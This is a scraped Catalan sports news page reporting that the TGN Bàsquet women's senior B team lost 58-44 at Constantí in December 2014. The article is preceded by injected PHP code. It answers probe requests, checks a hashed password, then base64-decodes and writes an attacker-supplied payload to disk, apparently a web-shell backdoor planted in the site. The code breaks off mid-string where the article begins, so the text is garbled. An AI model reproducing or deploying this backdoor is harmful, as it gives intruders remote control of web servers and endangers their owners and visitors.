function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Un mal tercer quart condemna el sènior femení B a la pista del Constantí (58-44) - Tgn Bàsquet Club -

Un mal tercer quart condemna el sènior femení B a la pista del Constantí (58-44)

Updated: desembre 22, 2014

L’equip sènior femení B del TGN Bàsquet va perdre de forma clara a la pista del líder, el Constantí, després de fer un mal tercer quart. El conjunt que entrena Jordi Crespo va jugar amb la baixa de quatre jugadores importants, havent d’incorporar tres jugadores cadet (Anton, Díaz i Velasco) per tal de completar la plantilla. Després d’un inici en què les locals van obrir el primer forat, el segon quart va ser d’equilibri, però al llindar del descans les visitants van començar a afluixar i el partit va quedar en mans del Constantí que va mig sentenciar després d’un parcial de 17-3 en el tercer quart. El TGN Bàsquet va reaccionar en l’últim període gràcies a dos triples d’Altarejos, però la diferència era massa gran.